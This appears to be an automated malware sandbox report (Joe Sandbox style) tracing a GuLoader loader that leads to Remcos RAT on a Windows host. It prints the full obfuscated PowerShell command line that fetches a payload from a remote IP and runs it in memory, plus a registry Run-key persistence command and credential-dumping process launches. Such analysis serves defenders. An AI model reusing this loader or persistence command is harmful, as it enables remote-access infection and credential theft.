                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:3
                                                                                                              Start time:01:14:03
                                                                                                              Start date:02/05/2024
                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                              Imagebase:0x7ff7e52b0000
                                                                                                              File size:55'320 bytes
                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:false

                                                                                                              General

                                                                                                              Target ID:4
                                                                                                              Start time:01:14:04
                                                                                                              Start date:02/05/2024
                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Idealogical143.cho && echo $"
                                                                                                              Imagebase:0x790000
                                                                                                              File size:236'544 bytes
                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:5
                                                                                                              Start time:01:14:10
                                                                                                              Start date:02/05/2024
                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kostplanen = 1;$Farvervej='Substrin';$Farvervej+='g';Function Bortledede($Heksekedlen220){$Electrostatic=$Heksekedlen220.Length-$Kostplanen;For($Lsehovederne=4; $Lsehovederne -lt $Electrostatic; $Lsehovederne+=(5)){$Teaseled+=$Heksekedlen220.$Farvervej.Invoke($Lsehovederne, $Kostplanen);}$Teaseled;}function Oraklerne($Forpagtnigsafgiftens110){. ($Attackman) ($Forpagtnigsafgiftens110);}$Rheophore=Bortledede 'BullM EftoTur,zSikkiQ.aflB ssl Prea Rew/Udlb5Tetr.Bill0Over quic( Ro,WIodiiF rgn G.sdLando AfgwCykes.agt BracN Fl,TBrok Pic,1Jetm0Lagr.Megi0Sho.; App AntiWLaiciSygenHymn6F,rr4 Unf;.rov alvaxAzox6Wapa4 Del;Paca Pro.r HydvOutl:U.de1Pea.2 Sca1.ntr.E.mo0slap)N.nc WindG AbleCompc UntkHor,o ,ei/slre2.rol0 Fir1 U,a0Pann0Bag.1Sten0fort1 arm Re,F katiA acrUnreeprp fCo,soNaphx Cl / An,1Bero2Inds1trlb.Mu k0An.i ';$prologfortolkere=Bortledede 'OphrU jrsMaage GonrSk b-MassAPentgUn,se RetnHa rt,nar ';$Renprisen=Bortledede 'ArthhKurdtCy,itRamppGabe:Hedt/ .ig/ anv8Flyt7 Hom.Extr1 ype2Pree1Fris.Bol 1Lovp0Post5Cott.Samm1P,th6 Ma 3 Dis/ dnSBefouFlinbTeoduA hemSandb,eapiSheelForgi,ishcPyntaNar lPar . MardSkufw Lemp Pos ';$Burgessdom=Bortledede 'W,ip>Til ';$Attackman=Bortledede 'Reisi,once,agaxR.gi ';$Robaades='Skjolddragerens';Oraklerne (Bortledede 'D.siS .pveTec.tColl-ElecC UnioBevinM.katL jle P,rnH.sht,rem Van,-RecuPTa taOvertMassh ,el Ro.dTSiou: Bru\TschtDesceProglPrefeE.ptfBarboSemirH,alb odiRenonS,rid erre rovlFremsOmkoe UdbnDgndsSagv.f rstSpirxResutLett I os-nonsV V,sa LoelSisbuFriteGain Exo$UndlRLithoDedibStttaLocoaSol,dResee FowsConv;sogg ');Oraklerne (Bortledede 'PlagiFor,f For D.to( OpvtTaste ChrsGrnstMid.- Forp EftaFas,t,tophArtu KoitTSt g:Ande\ CystS,are atalAflae.dmof,efioLnovrpantbex,si Vi.nLsepdSka eMalul Heas vege FornParas,ore.M.set CarxHiertAncr) P,e{FogeeTranxRaadikerntKirk}Syn,;Kase ');$Baetylic = Bortledede 'Kulte,ondcE,sahA atoTouc Nono% Stea VilpI tepGly d TroaT drtLi.ga Cen%gara\ ,igI FosdHyp.e DasaEighlMandoSvrtgGesjiStu.cCassaAr,plPeal1B ef4Rive3Si.n.Pab.cBaudhKla.oForr Ter& D,n&A.gl konveVrdicBabbhCompoNeoc S ta$ Sem ';Oraklerne (Bortledede '.ype$InfegB,atlFl,ko.ucubFritaEx.alGlo,:s moF ap,rCataoThyrg R kmVuggeAch,nVars=Vare( FrecmatemPistd and Spir/Ant.cDigi Pach$ F,rBProtaShine Cy t DepyCa,rlSelvi FagcSucc)Mora ');Oraklerne (Bortledede 'Pres$LykngBedalTapeoNakebTelpaSvvnlRaci:MorbDSmotiT pmsCplfpW seoUro.n Tope SkanStyrtFlyvetrskn Anch .reeFormdpappeUplenF ld=St,t$.mlgRMenieMi.enAmazp Ar,rgr niAmphsKrydeKug.nT,ng. mpsThrip Undl SeciPondtAf k(Spat$Rre.B KakuReflrKonsg .aleSi.asFa csBerrdSlanos,olmIsol),iat ');$Renprisen=$Disponentenheden[0];Oraklerne (Bortledede 'Ma t$Cherg SpalC.unoN.nebPrecaT.pclstoc:ForfSLevetFortaPrist KriiTitasForetUndei Chik BileXer,rO.ersGadm=NoniN SoreAutow,tan-UmagOMis.bloddj,tole .ufc BiltVill ReidSHotby emos ectunineCocomV.ka.AescNHalveFngstOmph.UnwiWSu,meS.yrbTetrCSlublDrggiJu teShunnFundtOver ');Oraklerne (Bortledede ' Spe$ BasSTrsktQ,inaDatatSam iGennsVuggt ndsi,debkDalieColdr.hirspana.CracHuncueThroawa.edP.ogeUndirThe sSyns[Lder$ Conpundir TauoConslLictoPyrog.kraf,eamo BolrSpect GhuoAarelGreyk Kole nskrFdesest,a] nd=In,x$BirsRHaemhinane SaloNovap.pech P woSemirSanie Is ');$Jotas=Bortledede 'BrilS,evrtNonea Ho.tKyndiGodds R,ttSe,viguldk lawe ikar BeksCher.D.ntDUnyooTilbw No nE.lblEquaoUku.aCo.ndFladFUnsliCorrl Fore ryp(U,de$TranRExtee G,onRectpSuperFartiEgsjsEmbrePle,nAlka, .ra$Fl rN Rape BesvA.coiDelilPin,lProde Nons Sk ) imp ';$Jotas=$Frogmen[1]+$Jotas;$Nevilles=$Frogmen[0];Oraklerne (Bortledede 'M mm$Dameg .psl,lvso Ma bSpejaEndulfy.r: HjlGLejea KallKarri lord SejiG.imaVerd=Malp(SkudTBoate .issUintt Fri-Har,PClipasprit RavhUngr Disk$fejlN rheArbevHob.iL.tmlLys.lFo.teKon,s Van)Supe ');while (!$Galidia) {Oraklerne (Bortledede 'Fnat$Lenig SkalFrplo OphbIn.iaSuc l ur:DryeY.rowdGalirCo se Polr OpsnBl geNon,= nn$ScratEfter Endu,rleeDdss ') ;Oraklerne $Jotas;Oraklerne (Bortledede 'Un,vSAlchtR.meaP.nsrSlv.tW,tt-,uttSBeholInqueTe.meEskipFolk Kna.4 Non ');Oraklerne (Bortledede 'Forb$SamugrenolU.aboety.bHasma Fa,lma.r:tilhGPrj,aPolllso eiAfkrdMentiComaaitch=L,sk(AcraTSamoeSub sIsoctU,ad-Re,pPPse.aBengtNondhPagt Mast$ Ma,NTrane triv KlaiYurul Ratl v,leBiocsUnme)Esc. ') ;Oraklerne (Bortledede 'Bi t$KlimgStamlTempofngeb,ndeaDi clTaxa:H,reF D so ForrTu ksBagtiUdstk.frerskakiAjstn dengSub,sUnisuN ned MicgEngii,sylf.lagt ipe= .de$SoldgGyrol elvo TegbK.olaAntilColl:MunkJCabauOlied ,tnaSig iGowfs denmGaule .ff+gorg+I.ra% Ko,$RehnDOr.eiMetasBatcpFinaoTalmnGebeePol,n fo,tAcoee GlonPellhPhotePredd SeieGastn Apo.ImoecVerboSnoluT,kenForetColl ') ;$Renprisen=$Disponentenheden[$Forsikringsudgift];}Oraklerne (Bortledede ' Ho.$Bit.g CerlUdlaoOv rbRepea T,plPl t:S bnSDelfy NedvFlngaH,fta CobrBoarsPam.dHa lr Bree Cirn Speg oseCons skri=Bis. NickGCrype TvitReco-DitrC OveoUdginBagatPonde D.sn UnctEter Gen$Fo.uNspise Bugv D ciDobblSylll,ryge Eles mo, ');Oraklerne (Bortledede 'Beun$VaaggImp lNiu oO llbTrttabojal Smo:AnalD A.meLangcUnhooH mmmArrhpQ.anrO.spe libsOb asUniniPostvS aae Dek Un e=Havf Pelo[ arcSParky ddysselvtRet.eAflamFyrp.CompCmejso Vren SynvP,oteAarsrSnortFaxe]excu: rd:SkraFDolkr I,soHoflm ayeBAf.oa UdlsPseueS aa6Robo4OxydSMunitProsrBrakiSkuen ExcgBria(Band$UdlaSUnsyyMothv ph,a .isaMun.r Fols Svad ud r .ave ResnOutbgD iveA.da)Inge ');Oraklerne (Bortledede ' aci$Overg Aabl ibroCe,tbStj.a D,nlForl:SextSFanta,rimaIncomCouna .chsHammk,rskiOplanCh,leFllesPara Wood= Han Cu v[ .prSDemoy,rops FirtSp deUform K.m. KapT CaceSl,axNonitThe..Vas EAr enTermc .loo ,ondundeiRippnredegDoo,]Dise:Imbe:BeelAReseSBeskCT ocIUndiI Op.. gleGYasheHositPo,lSKundtModsrEpuli,lagnUnw.gSyn.( dr$ .asDHenhePlaucsengoAn um SubpTararAcc eFilmsThussNutmi Uidv.alle Se )Unso ');Oraklerne (Bortledede 'Skol$e fogCroolLorgoFli,bFlueaCu wlGrun:DimpE.anscHannoUn,onFireoEnstm TiliP,riz PhiaLongtTilli,anio,eadnOutl=Fore$barnSf eea kroa hopmRetaaPrecsSydvkChemi,mstn ueleT,lhsVeri.MechsBasiu SkibPlaysP,pitDiskrSi.aiConcnSa igDelo(Reco3,urv2Ting4 Cau8Hydr1Lame0Chem,Slb.2Sun 7,jae9Sukk2 Ove5Kl.g)Skel ');Oraklerne $Economization;"
                                                                                                              Imagebase:0x7a0000
                                                                                                              File size:433'152 bytes
                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2590409597.0000000008570000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2584352581.0000000005919000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.2590524362.0000000008E66000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:6
                                                                                                              Start time:01:14:13
                                                                                                              Start date:02/05/2024
                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Idealogical143.cho && echo $"
                                                                                                              Imagebase:0x790000
                                                                                                              File size:236'544 bytes
                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:7
                                                                                                              Start time:01:14:14
                                                                                                              Start date:02/05/2024
                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
                                                                                                              Imagebase:0x7ff715980000
                                                                                                              File size:3'242'272 bytes
                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:false

                                                                                                              General

                                                                                                              Target ID:8
                                                                                                              Start time:01:14:14
                                                                                                              Start date:02/05/2024
                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2496 --field-trial-handle=2420,i,2104451589269232737,4580126100320580491,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                              Imagebase:0x7ff715980000
                                                                                                              File size:3'242'272 bytes
                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:false

                                                                                                              General

                                                                                                              Target ID:10
                                                                                                              Start time:01:14:47
                                                                                                              Start date:02/05/2024
                                                                                                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                                                                              Imagebase:0x7d0000
                                                                                                              File size:516'608 bytes
                                                                                                              MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.3229466080.0000000007337000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:moderate
                                                                                                              Has exited:false

                                                                                                              General

                                                                                                              Target ID:13
                                                                                                              Start time:01:14:56
                                                                                                              Start date:02/05/2024
                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Straddlers" /t REG_EXPAND_SZ /d "%Voiceless% -w 1 $Nedrakning=(Get-ItemProperty -Path 'HKCU:\Underlaying\').Ambisporangiate;%Voiceless% ($Nedrakning)"
                                                                                                              Imagebase:0x790000
                                                                                                              File size:236'544 bytes
                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:14
                                                                                                              Start time:01:14:56
                                                                                                              Start date:02/05/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:15
                                                                                                              Start time:01:14:56
                                                                                                              Start date:02/05/2024
                                                                                                              Path:C:\Windows\SysWOW64\reg.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Straddlers" /t REG_EXPAND_SZ /d "%Voiceless% -w 1 $Nedrakning=(Get-ItemProperty -Path 'HKCU:\Underlaying\').Ambisporangiate;%Voiceless% ($Nedrakning)"
                                                                                                              Imagebase:0xb30000
                                                                                                              File size:59'392 bytes
                                                                                                              MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:moderate
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:16
                                                                                                              Start time:01:15:05
                                                                                                              Start date:02/05/2024
                                                                                                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\dtfhsudaxgbogptlufigqqhs"
                                                                                                              Imagebase:0x7d0000
                                                                                                              File size:516'608 bytes
                                                                                                              MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:17
                                                                                                              Start time:01:15:05
                                                                                                              Start date:02/05/2024
                                                                                                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nntztmoulottqvhpdqdzbdcbcgr"
                                                                                                              Imagebase:0x7d0000
                                                                                                              File size:516'608 bytes
                                                                                                              MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:18
                                                                                                              Start time:01:15:05
                                                                                                              Start date:02/05/2024
                                                                                                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nntztmoulottqvhpdqdzbdcbcgr"
                                                                                                              Imagebase:0x7d0000
                                                                                                              File size:516'608 bytes
                                                                                                              MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:19
                                                                                                              Start time:01:15:05
                                                                                                              Start date:02/05/2024
                                                                                                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nntztmoulottqvhpdqdzbdcbcgr"
                                                                                                              Imagebase:0x7d0000
                                                                                                              File size:516'608 bytes
                                                                                                              MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:20
                                                                                                              Start time:01:15:05
                                                                                                              Start date:02/05/2024
                                                                                                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\qpystfyvzwmgskdtubpbdixslnjqax"
                                                                                                              Imagebase:0x7d0000
                                                                                                              File size:516'608 bytes
                                                                                                              MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:21
                                                                                                              Start time:01:15:06
                                                                                                              Start date:02/05/2024
                                                                                                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\qpystfyvzwmgskdtubpbdixslnjqax"
                                                                                                              Imagebase:0x7d0000
                                                                                                              File size:516'608 bytes
                                                                                                              MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:22
                                                                                                              Start time:01:15:06
                                                                                                              Start date:02/05/2024
                                                                                                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\qpystfyvzwmgskdtubpbdixslnjqax"
                                                                                                              Imagebase:0x7d0000
                                                                                                              File size:516'608 bytes
                                                                                                              MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Disassembly

                                                                                                              Reset < >

                                                                                                                Executed Functions

                                                                                                                Function 02D9CC60 Relevance: .6, Instructions: 611COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2765711091.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_2d90000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 5f42b575c4a365dd21a1bdbdd087e5bdcb51b6d0d9e3c51d2d75a865e4e1965e
                                                                                                                • Instruction ID: a8464b026691d3436efaa009dd5adc3b944c2927aa5360ce255aa6b21a5932c2
                                                                                                                • Opcode Fuzzy Hash: 5f42b575c4a365dd21a1bdbdd087e5bdcb51b6d0d9e3c51d2d75a865e4e1965e
                                                                                                                • Instruction Fuzzy Hash: C432BD719193949FDB02DF68C890AC9BFB1FF4A310F198196E484DB2A2C735DD4ACB91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 075D64D8 Relevance: 15.5, Strings: 12, Instructions: 484COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2809282197.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_75d0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4']q$4']q$4']q$4']q$4']q$4']q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                                                                • API String ID: 0-78369665
                                                                                                                • Opcode ID: 9d189ebfd21a5090425baa12762ea4621b53828a610a432154d97eee36e710a1
                                                                                                                • Instruction ID: 1ad8477099f9d64b1dacee1b1bb048b68038c180a586c60e8e33a0b3d65442e8
                                                                                                                • Opcode Fuzzy Hash: 9d189ebfd21a5090425baa12762ea4621b53828a610a432154d97eee36e710a1
                                                                                                                • Instruction Fuzzy Hash: 94F1F4B1704346CFDB359B6C89106EABFB6FF82250F1484ABD845CB252DA35CD46C7A2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 075D5A88 Relevance: 9.0, Strings: 7, Instructions: 250COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2809282197.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_75d0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4']q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                                                                • API String ID: 0-1994962952
                                                                                                                • Opcode ID: 5dfabe6a47a3018589cb23ba8f7b586a59b44e4cf979141a57765f2ed0ff6f30
                                                                                                                • Instruction ID: 145dd2135bfb85a3a7ac76048b494b77a826a98571381f8670b5ab88b26ed6e4
                                                                                                                • Opcode Fuzzy Hash: 5dfabe6a47a3018589cb23ba8f7b586a59b44e4cf979141a57765f2ed0ff6f30
                                                                                                                • Instruction Fuzzy Hash: 268116707142159FDB399E3C8960AFA7BE2AF81310F648467D8029F2A1EB76DD50C7B1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 075D2BA0 Relevance: 6.8, Strings: 5, Instructions: 578COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2809282197.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_75d0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4']q$4']q$4']q$4']q$U
                                                                                                                • API String ID: 0-994089792
                                                                                                                • Opcode ID: 8f3ed810e82034fa5be325c8bea4becf18f1ff3304d182a7447bcbddd2f1f0b3
                                                                                                                • Instruction ID: 5d28deb2303b23ed08472a7d20f43e36bdcc96522d1e6ab64133f1c0e447a2a9
                                                                                                                • Opcode Fuzzy Hash: 8f3ed810e82034fa5be325c8bea4becf18f1ff3304d182a7447bcbddd2f1f0b3
                                                                                                                • Instruction Fuzzy Hash: D5120871B04216CFCB259B6C84116EABBE5FFC6311F2484BBD905CB251DA32CD46C7A2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 075D5A69 Relevance: 5.2, Strings: 4, Instructions: 152COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2809282197.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_75d0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $]q$$]q$$]q$$]q
                                                                                                                • API String ID: 0-858218434
                                                                                                                • Opcode ID: ba42d7ad3f2e2316c78950c95422bd31546050f29bc721d088b99be0a0af03b3
                                                                                                                • Instruction ID: 0ac69be12d0ceeef3fb1a82528562671f8369fe1f8e8909a794976a92d6afe55
                                                                                                                • Opcode Fuzzy Hash: ba42d7ad3f2e2316c78950c95422bd31546050f29bc721d088b99be0a0af03b3
                                                                                                                • Instruction Fuzzy Hash: 425104B1614202DFEB399E28C560BF97BA1BB41351F588463E8019B2E1FB76DD50CB71
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02D9DC60 Relevance: 4.3, Strings: 3, Instructions: 519COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2765711091.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_2d90000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Haq$$]q$$]q
                                                                                                                • API String ID: 0-1533201563
                                                                                                                • Opcode ID: da6dd239b77ba15b8e422fde03e2273976fe28338e8d96ba5c80ef5fe3bd279e
                                                                                                                • Instruction ID: b8a3093f9d47fe9803fd5b0a09404c99d1cd1cc9ceca47b670e66df3feb4720b
                                                                                                                • Opcode Fuzzy Hash: da6dd239b77ba15b8e422fde03e2273976fe28338e8d96ba5c80ef5fe3bd279e
                                                                                                                • Instruction Fuzzy Hash: 11227234B002549FCB65DB24C854AAEB7B2FF89304F1484EAE50AAB361DF359D85CF91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 075D5BFE Relevance: 2.6, Strings: 2, Instructions: 54COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2809282197.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_75d0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $]q$$]q
                                                                                                                • API String ID: 0-127220927
                                                                                                                • Opcode ID: 02470376fd658b3517bc06367e86648194f8ec391d58fcc6567ba65a28aa5447
                                                                                                                • Instruction ID: 82198994f0c72751a4fb970e04a2648c67a4f45f5e46a41156965650c19fc349
                                                                                                                • Opcode Fuzzy Hash: 02470376fd658b3517bc06367e86648194f8ec391d58fcc6567ba65a28aa5447
                                                                                                                • Instruction Fuzzy Hash: D411C270620114DFDB39DB28C550ABDBBA2FB85714F608626E8016F270E776DD60CBB1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02D99710 Relevance: .6, Instructions: 610COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
